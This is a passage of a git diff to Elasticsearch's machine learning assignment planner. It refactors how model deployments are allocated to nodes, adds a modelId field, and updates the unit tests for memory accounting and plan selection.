+ * Otherwise, it will only ensure that deployments assigned to existing nodes will preserve at least one allocation. + * + * @param tryAssigningAllPreviouslyAllocatedModels whether to make a best effort to assign previously assigned models somewhere + * with at least one allocation + * @return the computed assignment plan + */ + public AssignmentPlan computePlan(boolean tryAssigningAllPreviouslyAllocatedModels) { logger.debug(() -> format("Computing plan for nodes = %s; deployments = %s", nodes, deployments)); AssignmentPlan bestPlan; AssignmentPlan planSatisfyingCurrentAssignments = solveSatisfyingCurrentAssignments(); logger.debug(() -> "Plan satisfying current assignments =\n" + planSatisfyingCurrentAssignments.prettyPrint()); - if (planSatisfyingCurrentAssignments.arePreviouslyAssignedModelsAssigned() == false && tryAssigningPreviouslyAssignedModels) { + if (planSatisfyingCurrentAssignments.arePreviouslyAssignedModelsAssigned() || tryAssigningAllPreviouslyAllocatedModels == false) { + bestPlan = planSatisfyingCurrentAssignments; + } else { + // try to reuse any deployment that would otherwise drop to zero allocations AssignmentPlan planAllocatingAtLeastOnceModelsThatWerePreviouslyAllocated = solveAllocatingAtLeastOnceModelsThatWerePreviouslyAllocated(); logger.debug( @@ -82,8 +95,6 @@ public AssignmentPlan computePlan(boolean tryAssigningPreviouslyAssignedModels) ? planSatisfyingCurrentAssignments : planAllocatingAtLeastOnceModelsThatWerePreviouslyAllocated; } - } else { - bestPlan = planSatisfyingCurrentAssignments; } logger.debug(() -> "Best plan =\n" + bestPlan.prettyPrint()); @@ -91,19 +102,30 @@ public AssignmentPlan computePlan(boolean tryAssigningPreviouslyAssignedModels) return bestPlan; } + /** + * Computes the best assignment plan from two strategies: + * 1. Preserving one allocation on current assignments, which is the most flexible + * 2. Preserving all allocations on current assignments, which is more conservative + * @return the best assignment plan + */ private AssignmentPlan solveSatisfyingCurrentAssignments() { AssignmentPlan bestPlan; // First solve preserving one allocation per assignment because that is most flexible AssignmentPlan planKeepingOneAllocationOnCurrentAssignments = solveKeepingOneAllocationOnCurrentAssignments(); + + if (planKeepingOneAllocationOnCurrentAssignments.satisfiesAllModels()) { + // If the plan satisfies all models, then we can use it as is + bestPlan = planKeepingOneAllocationOnCurrentAssignments; + } else if (planKeepingOneAllocationOnCurrentAssignments.satisfiesCurrentAssignments() == false) { + // If, in the new assignment plan, some deployments have fewer allocations than in the current assignments, + // try explicitly preserving all allocations on current assignments. bestPlan = solvePreservingAllAllocationsOnCurrentAssignments(); - } else if (planKeepingOneAllocationOnCurrentAssignments.satisfiesAllModels() == false) { + } else { + // Choose the best strategy according to {@link AssignmentPlan#computeQuality(AssignmentPlan)} AssignmentPlan planKeepingAllAllocationsOnCurrentAssignments = solvePreservingAllAllocationsOnCurrentAssignments(); bestPlan = planKeepingAllAllocationsOnCurrentAssignments.compareTo(planKeepingOneAllocationOnCurrentAssignments) >= 0 ?
planKeepingAllAllocationsOnCurrentAssignments : planKeepingOneAllocationOnCurrentAssignments; - } else { - bestPlan = planKeepingOneAllocationOnCurrentAssignments; } return bestPlan; } @@ -115,11 +137,12 @@ private AssignmentPlan solveAllocatingAtLeastOnceModelsThatWerePreviouslyAllocat .map( m -> new AssignmentPlan.Deployment( m.deploymentId(), + m.modelId(), m.memoryBytes(), 1, m.threadsPerAllocation(), // don't rely on the current allocation - new HashMap<>(), + Map.of(), m.maxAssignedAllocations(), m.getAdaptiveAllocationsSettings(), m.perDeploymentMemoryBytes(), @@ -148,6 +171,7 @@ private AssignmentPlan solveAllocatingAtLeastOnceModelsThatWerePreviouslyAllocat : Map.of(); return new AssignmentPlan.Deployment( m.deploymentId(), + m.modelId(), m.memoryBytes(), m.allocations(), m.threadsPerAllocation(), diff --git a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/planning/RandomizedAssignmentRounding.java b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/planning/RandomizedAssignmentRounding.java index 81696cd20d922..8bdc99998a0c2 100644 --- a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/planning/RandomizedAssignmentRounding.java +++ b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/planning/RandomizedAssignmentRounding.java @@ -310,6 +310,8 @@ private void unassignOversizedModels(Node n) { private AssignmentPlan toPlan() { AssignmentPlan.Builder builder = AssignmentPlan.builder(nodes, deployments); for (Map.Entry, Integer> assignment : tryAssigningRemainingCores().entrySet()) { + // TODO (#101612) The model should be assigned to the node only when it is possible. This means, that canAssign should be + // integrated into the assignModelToNode. 
if (builder.canAssign(assignment.getKey().v1(), assignment.getKey().v2(), assignment.getValue())) { builder.assignModelToNode(assignment.getKey().v1(), assignment.getKey().v2(), assignment.getValue()); } diff --git a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/planning/ZoneAwareAssignmentPlanner.java b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/planning/ZoneAwareAssignmentPlanner.java index c5b750f91014f..64cd40fdc537d 100644 --- a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/planning/ZoneAwareAssignmentPlanner.java +++ b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/planning/ZoneAwareAssignmentPlanner.java @@ -127,6 +127,7 @@ private AssignmentPlan computeZonePlan( d -> new AssignmentPlan.Deployment( // replace each deployment with a new deployment d.deploymentId(), + d.modelId(), d.memoryBytes(), deploymentIdToTargetAllocationsPerZone.get(d.deploymentId()), d.threadsPerAllocation(), @@ -163,6 +164,7 @@ private AssignmentPlan computePlanAcrossAllNodes(List plans) { .map( d -> new AssignmentPlan.Deployment( d.deploymentId(), + d.modelId(), d.memoryBytes(), d.allocations(), d.threadsPerAllocation(), @@ -180,30 +182,39 @@ private AssignmentPlan computePlanAcrossAllNodes(List plans) { List planDeployments = preserveAllAllocations.modelsPreservingAllocations(); AssignmentPlan plan = new LinearProgrammingPlanSolver(planNodes, planDeployments).solvePlan(false); plan = preserveAllAllocations.mergePreservedAllocations(plan); - return swapOriginalModelsInPlan(plan, allNodes, modelsAccountingPlans); + return swapOriginalDeploymentsInPlan(plan, allNodes, modelsAccountingPlans); } - private AssignmentPlan swapOriginalModelsInPlan( + /** + * The method is responsible for reconstructing an AssignmentPlan + * by replacing the deployments and nodes in the given plan with their original counterparts. + * This ensures that the final plan uses the original objects while preserving the assignments + * and memory accounting from the input plan. 
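Relatedly, the TODO in RandomizedAssignmentRounding above points at a check-then-act seam: toPlan must call canAssign before assignModelToNode or risk the IllegalArgumentException thrown by the builder. One illustrative way to fold the two together, in the spirit of the TODO (#101612) rather than code from this PR:

final class GuardedAssignSketch {
    // Minimal builder surface; the real one is AssignmentPlan.Builder.
    interface Builder {
        boolean canAssign(String deploymentId, String nodeId, int allocations);
        void assignModelToNode(String deploymentId, String nodeId, int allocations);
    }

    /** Returns true when the assignment was applied, false when it would not fit. */
    static boolean tryAssign(Builder builder, String deploymentId, String nodeId, int allocations) {
        if (builder.canAssign(deploymentId, nodeId, allocations) == false) {
            return false; // caller can move on to the next candidate node
        }
        builder.assignModelToNode(deploymentId, nodeId, allocations);
        return true;
    }
}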
+ * + * @param plan AssignmentPlan to reconstruct with original models and nodes + * @param allNodes List of all nodes in the system, used to find original nodes + * @param planDeployments List of deployments in the plan, not the original deployments + * @return final plan with original models and nodes swapped in + */ + private AssignmentPlan swapOriginalDeploymentsInPlan( AssignmentPlan plan, List allNodes, List planDeployments ) { - final Map originalModelById = deployments.stream() + final Map originalDeploymentsById = deployments.stream() .collect(Collectors.toMap(AssignmentPlan.Deployment::deploymentId, Function.identity())); final Map originalNodeById = allNodes.stream().collect(Collectors.toMap(Node::id, Function.identity())); - AssignmentPlan.Builder planBuilder = AssignmentPlan.builder(allNodes, deployments); - for (AssignmentPlan.Deployment m : planDeployments) { - AssignmentPlan.Deployment originalDeployment = originalModelById.get(m.deploymentId()); - Map nodeAssignments = plan.assignments(m).orElse(Map.of()); + AssignmentPlan.Builder finalPlanBuilder = AssignmentPlan.builder(allNodes, deployments); + + for (AssignmentPlan.Deployment planDeployment : planDeployments) { + AssignmentPlan.Deployment originalDeployment = originalDeploymentsById.get(planDeployment.deploymentId()); + Map nodeAssignments = plan.assignments(planDeployment).orElse(Map.of()); for (Map.Entry assignment : nodeAssignments.entrySet()) { Node originalNode = originalNodeById.get(assignment.getKey().id()); - planBuilder.assignModelToNode(originalDeployment, originalNode, assignment.getValue()); - // As the node has all its available memory we need to manually account memory of models with - // current allocations. - planBuilder.accountMemory(originalDeployment, originalNode); + finalPlanBuilder.assignModelToNode(originalDeployment, originalNode, assignment.getValue()); } } - return planBuilder.build(); + return finalPlanBuilder.build(); } private Map> mergeAllocationsByNodeIdByDeploymentId(List plans) { diff --git a/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/MlSingleNodeTestCase.java b/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/MlSingleNodeTestCase.java index 8898cac495706..c8c78e13f5b09 100644 --- a/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/MlSingleNodeTestCase.java +++ b/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/MlSingleNodeTestCase.java @@ -121,11 +121,7 @@ public void tearDown() throws Exception { protected void waitForMlTemplates() throws Exception { // block until the templates are installed - ClusterServiceUtils.awaitClusterState( - logger, - MachineLearning::criticalTemplatesInstalled, - getInstanceFromNode(ClusterService.class) - ); + ClusterServiceUtils.awaitClusterState(MachineLearning::criticalTemplatesInstalled, getInstanceFromNode(ClusterService.class)); } protected void blockingCall(Consumer> function, AtomicReference response, AtomicReference error) diff --git a/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/TrainedModelAssignmentClusterServiceTests.java b/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/TrainedModelAssignmentClusterServiceTests.java index 31260403e5d92..059a8c573e039 100644 --- a/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/TrainedModelAssignmentClusterServiceTests.java +++ b/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/TrainedModelAssignmentClusterServiceTests.java @@ -208,7 +208,6 @@ 
public void testClusterChanged_GivenNodesAdded_ThenLogMlNodeHeterogeneityCalled( TrainedModelAssignmentClusterService serviceSpy = spy(createClusterService(randomInt(5))); doNothing().when(serviceSpy).logMlNodeHeterogeneity(); doReturn(false).when(serviceSpy).eventStateHasGlobalBlockStateNotRecoveredBlock(any()); - doReturn(false).when(serviceSpy).eventStateMinTransportVersionIsBeforeDistributedModelAllocationTransportVersion(any()); ClusterChangedEvent mockNodesAddedEvent = mock(ClusterChangedEvent.class); ClusterState mockState = mock(ClusterState.class); diff --git a/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/TrainedModelAssignmentRebalancerTests.java b/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/TrainedModelAssignmentRebalancerTests.java index a2b321a332ae1..b873493100798 100644 --- a/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/TrainedModelAssignmentRebalancerTests.java +++ b/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/TrainedModelAssignmentRebalancerTests.java @@ -21,6 +21,7 @@ import org.elasticsearch.xpack.core.ml.inference.assignment.TrainedModelAssignment; import org.elasticsearch.xpack.core.ml.inference.assignment.TrainedModelAssignmentMetadata; import org.elasticsearch.xpack.ml.MachineLearning; +import org.elasticsearch.xpack.ml.inference.assignment.planning.AssignmentPlan; import org.elasticsearch.xpack.ml.job.NodeLoad; import java.util.ArrayList; @@ -28,6 +29,8 @@ import java.util.List; import java.util.Map; import java.util.Optional; +import java.util.function.Function; +import java.util.stream.Collectors; import static org.hamcrest.Matchers.aMapWithSize; import static org.hamcrest.Matchers.anEmptyMap; @@ -1127,6 +1130,74 @@ public void testRebalance_GivenFirstModelToAdd_GivenScalingProcessorSetting() { assertThat(assignment.getReason().isPresent(), is(false)); } + public void testCopyAssignments() { + // Create test nodes + AssignmentPlan.Node node1 = new AssignmentPlan.Node("node-1", ByteSizeValue.ofGb(1).getBytes(), 4); + AssignmentPlan.Node node2 = new AssignmentPlan.Node("node-2", ByteSizeValue.ofGb(1).getBytes(), 8); + List nodes = List.of(node1, node2); + + // Create test deployments + AssignmentPlan.Deployment deployment1 = new AssignmentPlan.Deployment( + "deployment-1", + "model-1", + ByteSizeValue.ofMb(100).getBytes(), + 2, + 1, + Map.of(), + 0, + null, + Priority.NORMAL, + 0, + 0 + ); + AssignmentPlan.Deployment deployment2 = new AssignmentPlan.Deployment( + "deployment-2", + "model-2", + ByteSizeValue.ofMb(100).getBytes(), + 1, + 2, + Map.of(), + 0, + null, + Priority.LOW, + 0, + 0 + ); + List deployments = List.of(deployment1, deployment2); + + // Create source plan and assign models to nodes + AssignmentPlan.Builder sourceBuilder = AssignmentPlan.builder(nodes, deployments); + sourceBuilder.assignModelToNode(deployment1, node1, 1); + sourceBuilder.assignModelToNode(deployment1, node2, 1); + sourceBuilder.assignModelToNode(deployment2, node2, 1); + AssignmentPlan source = sourceBuilder.build(); + + // Create destination plan + AssignmentPlan.Builder dest = AssignmentPlan.builder(nodes, deployments); + + // Create map of node IDs to original nodes + Map originalNodeById = nodes.stream() + .collect(Collectors.toMap(AssignmentPlan.Node::id, Function.identity())); + + // Call copyAssignments + TrainedModelAssignmentRebalancer.copyAssignments(source, dest, originalNodeById); + + // Build the destination plan + AssignmentPlan 
result = dest.build(); + + // Verify assignments + Optional> deployment1Assignments = result.assignments(deployment1); + assertThat(deployment1Assignments.isPresent(), is(true)); + assertThat(deployment1Assignments.get().size(), equalTo(2)); + assertThat(deployment1Assignments.get().get(node1), equalTo(1)); + assertThat(deployment1Assignments.get().get(node2), equalTo(1)); + + Optional> deployment2Assignments = result.assignments(deployment2); + assertThat(deployment2Assignments.isPresent(), is(true)); + assertThat(deployment2Assignments.get().size(), equalTo(1)); + assertThat(deployment2Assignments.get().get(node2), equalTo(1)); + } + private static StartTrainedModelDeploymentAction.TaskParams lowPriorityParams(String deploymentId, long modelSize) { return lowPriorityParams(deploymentId, deploymentId, modelSize); } diff --git a/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/planning/AssignmentPlanTests.java b/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/planning/AssignmentPlanTests.java index 3f93c3431d891..c7f166a19bb69 100644 --- a/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/planning/AssignmentPlanTests.java +++ b/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/planning/AssignmentPlanTests.java @@ -16,6 +16,7 @@ import java.util.Map; import static org.hamcrest.Matchers.contains; +import static org.hamcrest.Matchers.containsString; import static org.hamcrest.Matchers.equalTo; import static org.hamcrest.Matchers.greaterThan; import static org.hamcrest.Matchers.is; @@ -25,14 +26,14 @@ public class AssignmentPlanTests extends ESTestCase { public void testBuilderCtor_GivenDuplicateNode() { Node n = new Node("n_1", 100, 4); - AssignmentPlan.Deployment m = new AssignmentPlan.Deployment("m_1", 40, 1, 2, Map.of(), 0, null, 0, 0); + AssignmentPlan.Deployment m = new AssignmentPlan.Deployment("m_1", "m_1", 40, 1, 2, Map.of(), 0, null, 0, 0); expectThrows(IllegalArgumentException.class, () -> AssignmentPlan.builder(List.of(n, n), List.of(m))); } public void testBuilderCtor_GivenDuplicateModel() { Node n = new Node("n_1", 100, 4); - Deployment m = new AssignmentPlan.Deployment("m_1", 40, 1, 2, Map.of(), 0, null, 0, 0); + Deployment m = new AssignmentPlan.Deployment("m_1", "m_1", 40, 1, 2, Map.of(), 0, null, 0, 0); expectThrows(IllegalArgumentException.class, () -> AssignmentPlan.builder(List.of(n), List.of(m, m))); } @@ -42,6 +43,7 @@ public void testAssignModelToNode_GivenNoPreviousAssignment() { { // old memory format AssignmentPlan.Deployment m = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(40).getBytes(), 1, @@ -75,6 +77,7 @@ public void testAssignModelToNode_GivenNoPreviousAssignment() { } { // new memory format AssignmentPlan.Deployment m = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(20).getBytes(), 1, @@ -112,6 +115,7 @@ public void testAssignModelToNode_GivenNewPlanSatisfiesCurrentAssignment() { Node n = new Node("n_1", ByteSizeValue.ofMb(350).getBytes(), 4); { // old memory format AssignmentPlan.Deployment m = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(30).getBytes(), 2, @@ -128,7 +132,7 @@ public void testAssignModelToNode_GivenNewPlanSatisfiesCurrentAssignment() { builder.assignModelToNode(m, n, 1); assertThat(builder.getRemainingCores(n), equalTo(2)); - assertThat(builder.getRemainingMemory(n), equalTo(ByteSizeValue.ofMb(350).getBytes())); + assertThat(builder.getRemainingMemory(n), 
equalTo(ByteSizeValue.ofMb(50).getBytes())); assertThat(builder.getRemainingAllocations(m), equalTo(1)); assertThat(builder.getRemainingThreads(m), equalTo(2)); @@ -140,6 +144,7 @@ public void testAssignModelToNode_GivenNewPlanSatisfiesCurrentAssignment() { } { // new memory format AssignmentPlan.Deployment m = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(25).getBytes(), 2, @@ -156,7 +161,7 @@ public void testAssignModelToNode_GivenNewPlanSatisfiesCurrentAssignment() { builder.assignModelToNode(m, n, 1); assertThat(builder.getRemainingCores(n), equalTo(2)); - assertThat(builder.getRemainingMemory(n), equalTo(ByteSizeValue.ofMb(325).getBytes())); + assertThat(builder.getRemainingMemory(n), equalTo(ByteSizeValue.ofMb(0).getBytes())); assertThat(builder.getRemainingAllocations(m), equalTo(1)); assertThat(builder.getRemainingThreads(m), equalTo(2)); @@ -173,14 +178,16 @@ public void testAssignModelToNode_GivenNewPlanDoesNotSatisfyCurrentAssignment() Node n = new Node("n_1", ByteSizeValue.ofMb(300).getBytes(), 4); { // old memory format - Deployment m = new Deployment("m_1", ByteSizeValue.ofMb(30).getBytes(), 2, 2, Map.of("n_1", 2), 0, null, 0, 0); + Deployment m = new Deployment("m_1", "m_1", ByteSizeValue.ofMb(30).getBytes(), 2, 2, Map.of("n_1", 2), 0, null, 0, 0); AssignmentPlan.Builder builder = AssignmentPlan.builder(List.of(n), List.of(m)); builder.assignModelToNode(m, n, 1); assertThat(builder.getRemainingCores(n), equalTo(2)); - assertThat(builder.getRemainingMemory(n), equalTo(ByteSizeValue.ofMb(300).getBytes())); + // Since perDeployment memory is not specified, we compute the base memory usage. + // The remaining memory is 300MB - (240 MB + 2*30 MB) = 0MB + assertThat(builder.getRemainingMemory(n), equalTo(ByteSizeValue.ofMb(0).getBytes())); assertThat(builder.getRemainingAllocations(m), equalTo(1)); assertThat(builder.getRemainingThreads(m), equalTo(2)); @@ -193,6 +200,7 @@ public void testAssignModelToNode_GivenNewPlanDoesNotSatisfyCurrentAssignment() { // new memory format Deployment m = new Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(25).getBytes(), 2, @@ -209,7 +217,11 @@ public void testAssignModelToNode_GivenNewPlanDoesNotSatisfyCurrentAssignment() builder.assignModelToNode(m, n, 1); assertThat(builder.getRemainingCores(n), equalTo(2)); - assertThat(builder.getRemainingMemory(n), equalTo(ByteSizeValue.ofMb(275).getBytes())); + // base memory: 240+2*25 = 290MB + // since perDeployment memory is specified, we compute the new memory format usage: + // 250 (perDeployment) + 1*25 (perAllocation) + 25 (modelDefinition) = 300MB + // Then we take the maximum of 290 and 300, which is 300MB + assertThat(builder.getRemainingMemory(n), equalTo(ByteSizeValue.ofMb(0).getBytes())); assertThat(builder.getRemainingAllocations(m), equalTo(1)); assertThat(builder.getRemainingThreads(m), equalTo(2)); @@ -223,7 +235,7 @@ public void testAssignModelToNode_GivenNewPlanDoesNotSatisfyCurrentAssignment() public void testAssignModelToNode_GivenPreviouslyUnassignedModelDoesNotFit() { Node n = new Node("n_1", ByteSizeValue.ofMb(340 - 1).getBytes(), 4); - Deployment m = new AssignmentPlan.Deployment("m_1", ByteSizeValue.ofMb(50).getBytes(), 2, 2, Map.of(), 0, null, 0, 0); + Deployment m = new AssignmentPlan.Deployment("m_1", "m_1", ByteSizeValue.ofMb(50).getBytes(), 2, 2, Map.of(), 0, null, 0, 0); AssignmentPlan.Builder builder = AssignmentPlan.builder(List.of(n), List.of(m)); Exception e = expectThrows(IllegalArgumentException.class, () -> builder.assignModelToNode(m, n, 1)); @@ 
-235,6 +247,7 @@ public void testAssignModelToNode_GivenPreviouslyAssignedModelDoesNotFit() { { // old memory format Node n = new Node("n_1", ByteSizeValue.ofMb(340 - 1).getBytes(), 4); AssignmentPlan.Deployment m = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(50).getBytes(), 2, @@ -248,16 +261,13 @@ public void testAssignModelToNode_GivenPreviouslyAssignedModelDoesNotFit() { AssignmentPlan.Builder builder = AssignmentPlan.builder(List.of(n), List.of(m)); - builder.assignModelToNode(m, n, 2); - AssignmentPlan plan = builder.build(); - - assertThat(plan.deployments(), contains(m)); - assertThat(plan.satisfiesCurrentAssignments(), is(true)); - assertThat(plan.assignments(m).get(), equalTo(Map.of(n, 2))); + Exception e = expectThrows(IllegalArgumentException.class, () -> builder.assignModelToNode(m, n, 2)); + assertThat(e.getMessage(), containsString("not enough memory on node")); } { // new memory format Node n = new Node("n_1", ByteSizeValue.ofMb(340 - 1).getBytes(), 4); AssignmentPlan.Deployment m = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(30).getBytes(), 2, @@ -271,18 +281,14 @@ public void testAssignModelToNode_GivenPreviouslyAssignedModelDoesNotFit() { AssignmentPlan.Builder builder = AssignmentPlan.builder(List.of(n), List.of(m)); - builder.assignModelToNode(m, n, 2); - AssignmentPlan plan = builder.build(); - - assertThat(plan.deployments(), contains(m)); - assertThat(plan.satisfiesCurrentAssignments(), is(true)); - assertThat(plan.assignments(m).get(), equalTo(Map.of(n, 2))); + Exception e = expectThrows(IllegalArgumentException.class, () -> builder.assignModelToNode(m, n, 2)); + assertThat(e.getMessage(), containsString("not enough memory on node")); } } public void testAssignModelToNode_GivenNotEnoughCores_AndSingleThreadPerAllocation() { Node n = new Node("n_1", ByteSizeValue.ofMb(500).getBytes(), 4); - Deployment m = new AssignmentPlan.Deployment("m_1", ByteSizeValue.ofMb(100).getBytes(), 5, 1, Map.of(), 0, null, 0, 0); + Deployment m = new AssignmentPlan.Deployment("m_1", "m_1", ByteSizeValue.ofMb(100).getBytes(), 5, 1, Map.of(), 0, null, 0, 0); AssignmentPlan.Builder builder = AssignmentPlan.builder(List.of(n), List.of(m)); Exception e = expectThrows(IllegalArgumentException.class, () -> builder.assignModelToNode(m, n, 5)); @@ -296,6 +302,7 @@ public void testAssignModelToNode_GivenNotEnoughCores_AndSingleThreadPerAllocati public void testAssignModelToNode_GivenNotEnoughCores_AndMultipleThreadsPerAllocation() { Node n = new Node("n_1", ByteSizeValue.ofMb(500).getBytes(), 5); AssignmentPlan.Deployment m = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(100).getBytes(), 3, @@ -319,6 +326,7 @@ public void testAssignModelToNode_GivenNotEnoughCores_AndMultipleThreadsPerAlloc public void testAssignModelToNode_GivenSameModelAssignedTwice() { Node n = new Node("n_1", ByteSizeValue.ofMb(1000).getBytes(), 8); Deployment m = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(50).getBytes(), 4, @@ -362,7 +370,7 @@ public void testAssignModelToNode_GivenSameModelAssignedTwice() { public void testCanAssign_GivenPreviouslyUnassignedModelDoesNotFit() { Node n = new Node("n_1", 100, 5); - AssignmentPlan.Deployment m = new AssignmentPlan.Deployment("m_1", 101, 1, 1, Map.of(), 0, null, 0, 0); + AssignmentPlan.Deployment m = new AssignmentPlan.Deployment("m_1", "m_1", 101, 1, 1, Map.of(), 0, null, 0, 0); AssignmentPlan.Builder builder = AssignmentPlan.builder(List.of(n), List.of(m)); @@ -373,13 +381,16 @@ public void 
testCanAssign_GivenPreviouslyAssignedModelDoesNotFit() { Node n = new Node("n_1", ByteSizeValue.ofMb(300).getBytes(), 5); { // old memory format - Deployment m = new Deployment("m_1", ByteSizeValue.ofMb(31).getBytes(), 1, 1, Map.of("n_1", 1), 0, null, 0, 0); + Deployment m = new Deployment("m_1", "m_1", ByteSizeValue.ofMb(31).getBytes(), 1, 1, Map.of("n_1", 1), 0, null, 0, 0); AssignmentPlan.Builder builder = AssignmentPlan.builder(List.of(n), List.of(m)); - assertThat(builder.canAssign(m, n, 1), is(true)); + // 240 + 2*31 = 302MB, this doesn't fit in 300MB. We don't care that the deployment is currently allocated since + // only previous assignments should be considered + assertThat(builder.canAssign(m, n, 1), is(false)); } { // new memory format Deployment m = new Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(25).getBytes(), 1, @@ -387,17 +398,22 @@ public void testCanAssign_GivenPreviouslyAssignedModelDoesNotFit() { Map.of("n_1", 1), 0, null, - ByteSizeValue.ofMb(300).getBytes(), + ByteSizeValue.ofMb(265).getBytes(), ByteSizeValue.ofMb(10).getBytes() ); AssignmentPlan.Builder builder = AssignmentPlan.builder(List.of(n), List.of(m)); + // 265 + 1*10 + 25 = 300MB, which fits exactly into the 300MB available on the node assertThat(builder.canAssign(m, n, 1), is(true)); + builder.assignModelToNode(m, n, 1); + // After assignment, no more memory is available + assertThat(builder.canAssign(m, n, 1), is(false)); } } public void testCanAssign_GivenEnoughMemory() { Node n = new Node("n_1", ByteSizeValue.ofMb(440).getBytes(), 5); AssignmentPlan.Deployment m = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(100).getBytes(), 3, @@ -422,13 +438,25 @@ public void testCompareTo_GivenDifferenceInPreviousAssignments() { Node n = new Node("n_1", ByteSizeValue.ofMb(300).getBytes(), 5); { - Deployment m = new AssignmentPlan.Deployment("m_1", ByteSizeValue.ofMb(30).getBytes(), 3, 2, Map.of("n_1", 2), 0, null, 0, 0); + Deployment m = new AssignmentPlan.Deployment( + "m_1", + "m_1", + ByteSizeValue.ofMb(30).getBytes(), + 3, + 2, + Map.of("n_1", 2), + 0, + null, + 0, + 0 + ); AssignmentPlan.Builder builder = AssignmentPlan.builder(List.of(n), List.of(m)); builder.assignModelToNode(m, n, 2); planSatisfyingPreviousAssignments = builder.build(); } { AssignmentPlan.Deployment m = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(30).getBytes(), 3, @@ -453,6 +481,7 @@ public void testCompareTo_GivenDifferenceInAllocations() { AssignmentPlan planWithFewerAllocations; Node n = new Node("n_1", ByteSizeValue.ofMb(300).getBytes(), 5); AssignmentPlan.Deployment m = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(30).getBytes(), 3, @@ -485,13 +514,25 @@ public void testCompareTo_GivenDifferenceInMemory() { Node n = new Node("n_1", ByteSizeValue.ofMb(300).getBytes(), 5); { - Deployment m = new AssignmentPlan.Deployment("m_1", ByteSizeValue.ofMb(30).getBytes(), 3, 2, Map.of("n_1", 1), 0, null, 0, 0); + Deployment m = new AssignmentPlan.Deployment( + "m_1", + "m_1", + ByteSizeValue.ofMb(30).getBytes(), + 3, + 2, + Map.of("n_1", 1), + 0, + null, + 0, + 0 + ); AssignmentPlan.Builder builder = AssignmentPlan.builder(List.of(n), List.of(m)); builder.assignModelToNode(m, n, 2); planUsingMoreMemory = builder.build(); } { AssignmentPlan.Deployment m = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(29).getBytes(), 3, @@ -517,6 +558,7 @@ public void testSatisfiesAllModels_GivenAllDeploymentsAreSatisfied() { { // old memory format 
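+ // For reference on the expected numbers throughout these tests (following the arithmetic in the assertions above):
+ // the old memory format charges 240MB of fixed overhead plus twice the model size (e.g. 240 + 2*50 = 340MB for a 50MB model),
+ // while the new format charges perDeploymentMemory + allocations * perAllocationMemory + the model size,
+ // and the planner keeps the larger of the two estimates.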
AssignmentPlan.Deployment deployment1 = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(50).getBytes(), 1, @@ -528,6 +570,7 @@ public void testSatisfiesAllModels_GivenAllDeploymentsAreSatisfied() { 0 ); AssignmentPlan.Deployment deployment2 = new AssignmentPlan.Deployment( + "m_2", "m_2", ByteSizeValue.ofMb(30).getBytes(), 2, @@ -539,6 +582,7 @@ public void testSatisfiesAllModels_GivenAllDeploymentsAreSatisfied() { 0 ); AssignmentPlan.Deployment deployment3 = new AssignmentPlan.Deployment( + "m_3", "m_3", ByteSizeValue.ofMb(20).getBytes(), 4, @@ -560,6 +604,7 @@ public void testSatisfiesAllModels_GivenAllDeploymentsAreSatisfied() { { // new memory format AssignmentPlan.Deployment deployment1 = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(50).getBytes(), 1, @@ -571,6 +616,7 @@ public void testSatisfiesAllModels_GivenAllDeploymentsAreSatisfied() { ByteSizeValue.ofMb(10).getBytes() ); AssignmentPlan.Deployment deployment2 = new AssignmentPlan.Deployment( + "m_2", "m_2", ByteSizeValue.ofMb(30).getBytes(), 2, @@ -582,6 +628,7 @@ public void testSatisfiesAllModels_GivenAllDeploymentsAreSatisfied() { ByteSizeValue.ofMb(10).getBytes() ); AssignmentPlan.Deployment deployment3 = new AssignmentPlan.Deployment( + "m_3", "m_3", ByteSizeValue.ofMb(20).getBytes(), 4, @@ -605,9 +652,9 @@ public void 